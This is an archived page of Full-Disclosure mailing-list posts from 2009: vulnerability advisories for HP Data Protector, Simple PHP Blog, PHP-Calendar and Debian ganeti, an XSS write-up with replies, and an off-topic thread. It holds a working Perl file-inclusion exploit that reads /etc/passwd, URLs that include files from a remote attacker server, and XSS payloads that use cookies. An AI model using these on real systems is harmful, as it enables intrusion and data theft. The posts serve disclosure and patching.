[Full-disclosure] TPTI-09-15: HP OpenView Data Protector Cell Manager Heap Overflow Vulnerability

2009-12-19 Thread dvlabs
TPTI-09-15: HP OpenView Data Protector Cell Manager Heap Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-09-15
December 17, 2009

-- CVE ID:
CVE-2007-2281

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard OpenView

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 4730. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Hewlett-Packard OpenView Data Protector.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the Cell Manager Database Service,
rds.exe, which binds to TCP port 1530. The service receives socket data
via _ncp32._NtrpTCPReceiveMsg() in the following format:

[0xB6298C23][4-byte size][][data]

The specified size parameter is subsequently used as the size parameter
to the memory allocation routines _rm32.rm_getMem(). Due to a lack of
sanity checking, values between 0xFFF8 and 0x result in an
integer overflow and therefore an under allocated heap buffer. The
following excerpt demonstrates this problem:

10004A57 mov eax, [ebp+arg_0]   ; specified size
10004A5A add eax, 8 ; integer overflow
10004A5D push eax
10004A5E call ds:__imp__malloc

The original packet data is later written to the under allocated buffer
using a size specifier equal to the number of bytes actually received as
the following excerpt from _ncp32._NtrpTCPReceiveMsg() shows:

002F2E77 mov eax, [ebp+received_length]
002F2E7A push eax; size_t
002F2E7B mov ecx, [ebp+received_data]
002F2E7E push ecx; src
002F2E7F mov edx, [ebp+allocated_buffer]
002F2E82 mov eax, [edx]
002F2E84 push eax; dst
002F2E85 call _memcpy

This issue can be exploited to overwrite a specified DWORD of memory and
further lead to arbitrary code execution.

-- Vendor Response:


-- Disclosure Timeline:
2006-10-10 - Vulnerability reported to vendor
2009-12-17 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Pedram Amini, TippingPoint DVLabs
* Anonymous

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
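The size handling the advisory describes, as an added example that is not TippingPoint's or HP's code: the unchecked 32-bit "size + 8" beside a hardened version that validates the length field before allocating, plus a parser for the [magic][4-byte size][data] frame. The 64 KiB limit, little-endian byte order and all function names are assumptions.

```c
/* Added example, not TippingPoint's or HP's code: models the rds.exe length
 * handling described above. vuln_alloc_size() mirrors the unchecked "size + 8"
 * that wraps a 32-bit value; safe_alloc_size() rejects sizes that could wrap or
 * disagree with the payload before any arithmetic. Names, the 64 KiB policy
 * limit and little-endian framing are assumptions. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define RDS_MAGIC 0xB6298C23u     /* framing constant from the advisory */
#define HDR_SLACK 8u              /* the "add eax, 8" in the excerpt */
#define MAX_MSG   (64u * 1024u)   /* assumed upper bound for one message */

/* Vulnerable pattern: plain 32-bit addition, so any declared size at or above
 * 0xFFFFFFF8 wraps into [0, 7] and malloc() hands back a tiny buffer. */
static uint32_t vuln_alloc_size(uint32_t declared)
{
    return (uint32_t)(declared + HDR_SLACK);
}

/* Hardened: bound the declared size BEFORE adding the slack, guard the add
 * explicitly, and require the length field to match the bytes that actually
 * arrived, because the later memcpy uses the received count, not the header.
 * Returns 0 and stores the allocation size on success, -1 on rejection. */
static int safe_alloc_size(uint32_t declared, size_t received, uint32_t *out)
{
    if (declared > MAX_MSG)                return -1; /* policy limit */
    if (declared > UINT32_MAX - HDR_SLACK) return -1; /* cannot wrap */
    if (received != declared)              return -1; /* header disagrees */
    *out = declared + HDR_SLACK;
    return 0;
}

/* Little-endian 32-bit decode (byte order is an assumption here). */
static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parses one framed message [magic][4-byte size][data] and copies the payload
 * into a buffer sized by safe_alloc_size(). Returns NULL for any malformed or
 * oversized frame; the caller frees the result. */
static unsigned char *parse_msg(const unsigned char *pkt, size_t len,
                                uint32_t *alloc_size)
{
    if (len < 8 || le32(pkt) != RDS_MAGIC) return NULL;
    uint32_t declared = le32(pkt + 4), alloc;
    if (safe_alloc_size(declared, len - 8, &alloc) != 0) return NULL;
    unsigned char *buf = malloc(alloc);
    if (buf == NULL) return NULL;
    memcpy(buf, pkt + 8, declared);  /* declared == len - 8 == alloc - 8 */
    *alloc_size = alloc;
    return buf;
}

int main(void)
{
    /* Constructed frame: magic, declared size 0xFFFFFFF8, four payload bytes. */
    unsigned char bad[] = {0x23,0x8C,0x29,0xB6, 0xF8,0xFF,0xFF,0xFF, 'A','B','C','D'};
    uint32_t sz;
    printf("vulnerable path would malloc(%u)\n", vuln_alloc_size(0xFFFFFFF8u));
    printf("hardened parse: %s\n", parse_msg(bad, sizeof bad, &sz) ? "ok" : "rejected");
    return 0;
}
```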


[Full-disclosure] [ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability

2009-12-19 Thread ISecAuditors Security Advisories
=
INTERNET SECURITY AUDITORS ALERT 2009-005
- Original release date: March 2nd, 2009
- Last revised:  December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=

I. VULNERABILITY
-
Simple PHP Blog <= 0.5.1 Local File Include vulnerability

II. BACKGROUND
-
Simple PHP Blog is a blog system that does not require database setup and
is very easy to install.

III. DESCRIPTION
-
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in 'languages_cgi.php' because the parameter 'blog_language1'
is not properly sanitized.

IV. PROOF OF CONCEPT
-
The affected code:

62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

Exploit:

#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana at isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV < 3) { die("Usage: $0 site path file cookie"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
    "http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");
my $res = $ua->request($req);

if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " . $res->status_line, "\n";
}

$ perl simple.pl example.com /blog /etc/passwd my_cookie_here|head -1
root:*:0:0:root:/root:/bin/bash

The bug can be exploited with or without 'magic_quotes_gpc', but note
that if magic_quotes_gpc is set to Off, an attacker can view any file
(such as /etc/passwd) by appending a '\0' character; if not, only PHP
files can be included, which still allows executing any local PHP file.

V. BUSINESS IMPACT
-
The impact is that an attacker can read arbitrary files in the context of
the web server and execute arbitrary local PHP scripts.

VI. SYSTEMS AFFECTED
-
Versions prior to and including 0.5.1 are affected.
In order to patch the application, the functions file_exists() and
basename() must be added to the affected code.

VII. SOLUTION
-
Change line 62 of languages_cgi.php in order to filter the
$_POST[ 'blog_language1' ] variable.

if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
    require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

VIII. REFERENCES
-
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com

IX. CREDITS
-
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-
March   02, 2009: Initial release.
December  18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December  13, 2009: Notified again. No response.
December  18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



[Full-disclosure] [ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability

2009-12-19 Thread ISecAuditors Security Advisories
=
INTERNET SECURITY AUDITORS ALERT 2009-011
- Original release date: October 13th, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3702
- Severity: 8.5/10 (CVSS Base Score)
=

I. VULNERABILITY
-
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion
vulnerability

II. BACKGROUND
-
PHP-Calendar is a simple web calendar. It is targeted towards groups
that need to collaboratively create and track events. In that same
collaborative spirit, the source for PHP-Calendar is available under
an open source license for anyone to use and modify.

III. DESCRIPTION
-
The 'configfile' variable is not properly filtered, and it is possible to
include arbitrary remote and local files. This attack may lead to the
execution of arbitrary code.

The snippet of vulnerable code (part of update08.php and update10.php
file):

36  } elseif(!empty($_GET['configfile'])) {
37      if(file_exists($_GET['configfile'])) {
38          require_once($_GET['configfile']);

In order to include remote files, the allow_url_fopen directive must be
set to 'On'. There are two cases in which remote code execution is
possible because the file_exists() check can be bypassed:

1) If the victim server is running the Windows operating system and there
is no firewall filtering outgoing SMB requests, an attacker can use
a URL like //servername/path/to/file.php
2) If the server is running PHP version >= 5.0.0 (the most common case), an
attacker can use the FTP/FTPS protocol for inclusion, like
ftp://servername/path/to/file.php. See references for more information.

IV. PROOF OF CONCEPT
-
For including remote files:

http://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
http://site/php-calendar-1.1/update08.php?configfile=ftp://guest:p...@site/path/to/file.php
http://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
http://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php

For local files, this PoC will show the /etc/passwd file:

http://site/php-calendar-1.1/update08.php?configfile=/etc/passwd
http://site/php-calendar-1.1/update10.php?configfile=/etc/passwd

V. BUSINESS IMPACT
-
Unauthenticated users can view any local file in the filesystem and
could execute arbitrary code remotely.

VI. SYSTEMS AFFECTED
-
PHP-Calendar version 1.1 is vulnerable; others may be affected.

VII. SOLUTION
-
Change the code of update08.php (line 38) and update10.php (line 35)
in order to filter the $_GET['configfile'] variable.

if (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile']))
    require_once($_GET['configfile']);

VIII. REFERENCES
-
http://www.php-calendar.com/
http://www.php.net/manual/en/wrappers.ftp.php
http://www.isecauditors.com/

IX. CREDITS
-
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-
October   13, 2009: Initial release.
October   19, 2009: Added CVE id.
December  18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-
October   13, 2009: Vulnerability discovered by
Internet Security Auditors (www.isecauditors.com)
October   13, 2009: Sent to developers. No response.
December  13, 2009: Contact again. No response.
December  18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



[Full-disclosure] XSS vulnerabilities via errors at requests to DB

2009-12-19 Thread MustLive
Hello participants of Full-Disclosure.

Let's continue the series of my articles about the most common places of XSS.

Earlier I already wrote about XSS vulnerabilities at 404 pages
(http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071664.html).
And already in 2008 I planned to tell about one interesting and widespread
vector of XSS attacks - the attacks via errors at requests to DB.

I had occasions to discover Cross-Site Scripting vulnerabilities in
different web applications, and also in browsers and web servers. And
besides XSS holes at Error 404 pages, I also often found XSS vulnerabilities
in messages about errors at requests to databases (XSS via SQL Error).

The standard vector of the attack in the case of XSS via SQL Error is setting
XSS code as the value of a parameter which is sent to the DB (for this it's
needed that the SQL query becomes incorrect). This leads to the web
application showing its message about the error at the request to the DB,
mentioning the line of the query where the error is, and to execution of the
JavaScript code in the user's browser.

XSS:

http://site/script?param=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

I found such vulnerabilities multiple times at different sites and in
different web applications, particularly in WordPress
(http://websecurity.com.ua/298/), Relay (http://websecurity.com.ua/2075/)
and Hydra Engine (http://websecurity.com.ua/3453/).

For example, in WordPress, to execute JS code in the error message it was
needed to send a special symbol (in this case %A0), which I already wrote
about in detail (http://websecurity.com.ua/298/).

XSS:

http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E

In some cases (particularly in PHP applications which use MySQL), it's
needed to use not the script tag but the body tag to conduct the XSS attack,
so that the code will be completely shown in the message about the error in
the SQL query. As, for example, in the case of the vulnerability at
www.zemerl.com (http://websecurity.com.ua/3327/).

XSS:

http://site/script?param='%20and%20%3Cbody%20onload=alert(document.cookie)%3E

Note that already in 2006 a vulnerability was found in PHP
(http://websecurity.com.ua/225/), which concerned the function mysql_error.
It returns the error of the last SQL query to MySQL in unfiltered form,
which can lead to an XSS attack. This vulnerability was found in PHP 4.4.x and
5.1.x. So web applications which use this function and show its results
can be vulnerable to XSS.

So web developers always need to check their projects for the presence of XSS
vulnerabilities in messages about errors at requests to the DB, to not allow
such vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



[Full-disclosure] [SECURITY] [DSA-1959-1] New ganeti packages fix arbitrary command execution

2009-12-19 Thread Raphael Geissert
- 
Debian Security Advisory DSA-1959-1  secur...@debian.org
http://www.debian.org/security/ Raphael Geissert
December 19, 2009 http://www.debian.org/security/faq
- 

Package: ganeti
Vulnerability  : missing input sanitation
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)  : CVE-2009-4261

It was discovered that ganeti, a virtual server cluster manager, does
not validate the path of scripts passed as arguments to certain
commands, which allows local or remote users (via the web interface in
versions 2.x) to execute arbitrary commands on a host acting as a
cluster master.

For the stable distribution (lenny), this problem has been fixed in
version 1.2.6-3+lenny2.

For the testing distribution (squeeze), this problem will be fixed
in version 2.0.5-1.

For the unstable distribution (sid), this problem has been fixed in
version 2.0.5-1.

The oldstable distribution (etch) does not include ganeti.


We recommend that you upgrade your ganeti packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.



Debian GNU/Linux 5.0 alias lenny (stable)
- -

Source archives:

  
http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6-3+lenny2.diff.gz
Size/MD5 checksum: 6912 766a061e63ca295c83ec9d81e71790f6
  http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6.orig.tar.gz
Size/MD5 checksum:   843282 ccc54866e02be044987027a827b1be03
  
http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6-3+lenny2.dsc
Size/MD5 checksum: 1443 6de6851e7ad49a555b9d7cafd65cf0c0

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/g/ganeti/ganeti_1.2.6-3+lenny2_all.deb
Size/MD5 checksum:   705030 dc11dab47b08a83d4023c213a989f08c


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg



Re: [Full-disclosure] XSS vulnerabilities via errors at requests to DB

2009-12-19 Thread Michal Zalewski
Dear MustLive,

 Earlier I wrote already about XSS vulnerabilities at 404 pages
 (http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071664.html).
 And already at 2008 I planned to tell about one interesting and widespread
 vector of XSS attacks - it's the attacks via errors at requests to DB.

Thank you for this excellent research!

Given your contributions in this area, I was hoping you could offer me
some advice: I recently stumbled upon an XSS flaw on a page with
vaguely turquoise background. I am not sure whether to classify this
as a separate class of a web vulnerability, or merely a novel
extension of well-established XSS attacks against sky blue targets?

Sincerely,
/mz



Re: [Full-disclosure] XSS vulnerabilities via errors at requests to DB

2009-12-19 Thread Michele Orru
I agree with Mostafa.
Leaving DB errors on a production web application is not a good thing:
more than that, hundreds of articles
have been written about Information Disclosure/Leakage (as you want to call it).

Some months ago I was blogging on reflected XSS in Java Exception
stack traces: nice to find it (as Stefano did many years ago about SQL
errors), really funny:

More information about some of my advisories on my blog:

http://antisnatchor.com/2008/12/18/eclipse-birt-reflected-xss/
http://antisnatchor.com/2009/03/10/riotfamily-release-80-xss/

Greetz
Michele antisnatchor Orru'

On Fri, Dec 18, 2009 at 3:58 PM, MustLive mustl...@websecurity.com.ua wrote:

 Hello participants of Full-Disclosure.

 Let's continue a series of my articles about the most common places of XSS.

 Earlier I wrote already about XSS vulnerabilities at 404 pages
 (http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071664.html).
 And already at 2008 I planned to tell about one interesting and widespread
 vector of XSS attacks - it's the attacks via errors at requests to DB.

 I had occasions to discover Cross-Site Scripting vulnerabilities in
 different web applications, and also in browsers and web servers. And
 besides XSS holes at Error 404 pages, I also often found XSS vulnerabilities
 in messages about errors at requests to databases (XSS via SQL Error).

 Standard vector of the attack in case of XSS via SQL Error - it's setting of
 XSS-code as value of parameter which is sending to DB (at this it's needed
 that this SQL query becomes incorrect). Which will lead to showing of web
 application's message about error at request to DB, with mentioning of the
 query's line where there is an error, and to executing of JavaScript code in
 browser of the user.

 XSS:

 http://site/script?param=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Such vulnerabilities I found multiple times at different sites and in
 different web applications, particularly in WordPress
 (http://websecurity.com.ua/298/), Relay (http://websecurity.com.ua/2075/)
 and Hydra Engine (http://websecurity.com.ua/3453/).

 For example, in WordPress to execute JS-code in error message, it was needed
 to send special symbol (in this case %A0), which I wrote about already in
 detail (http://websecurity.com.ua/298/).

 XSS:

 http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E

 In some cases (particularly in PHP-applications which use MySQL), it's
 needed to use not script tag, but body tag to conduct XSS attack, so the
 code will be completely showed in message about error in SQL query. As, for
 example, in case of vulnerability at www.zemerl.com
 (http://websecurity.com.ua/3327/).

 XSS:

 http://site/script?param='%20and%20%3Cbody%20onload=alert(document.cookie)%3E

 Note, that already in 2006 there was found vulnerability in PHP
 (http://websecurity.com.ua/225/), which concerned with function mysql_error.
 Which returns value of error of last SQL-query to MySQL in unfiltered form,
 which can lead to XSS attack. This vulnerability was found in PHP 4.4.x and
 5.1.x. So web applications, which use this function and show its results,
 can be vulnerable to XSS.

 So web developers always need to check their projects on presence of XSS
 vulnerabilities in messages about errors at requests to DB. To not allow
 such vulnerabilities.

 Best wishes & regards,
 MustLive
 Administrator of Websecurity web site
 http://websecurity.com.ua



Re: [Full-disclosure] Global warming - it's all about the money

2009-12-19 Thread Stephen Mullins
...it's hard to know what's true in the comings and goings of men throughout 
the world

Follow the money.

On Tue, Dec 15, 2009 at 11:09 AM, Jared DeMott jared.dem...@harris.com wrote:
 Paul Schmehl wrote:
 http://www.wnd.com/index.php?fa=PAGE.viewpageId=118953

 Businesses hold world hostage over carbon credits
 Even U.N. climate chief tied to new, 'green' extortion scam

 It was never about the climate.


 Not sure about all that, but it is sad that it's hard to know what's
 true in the comings and goings of men throughout the world.  Fortunately
 there are fundamental Truths you can hang your hat on. ;)
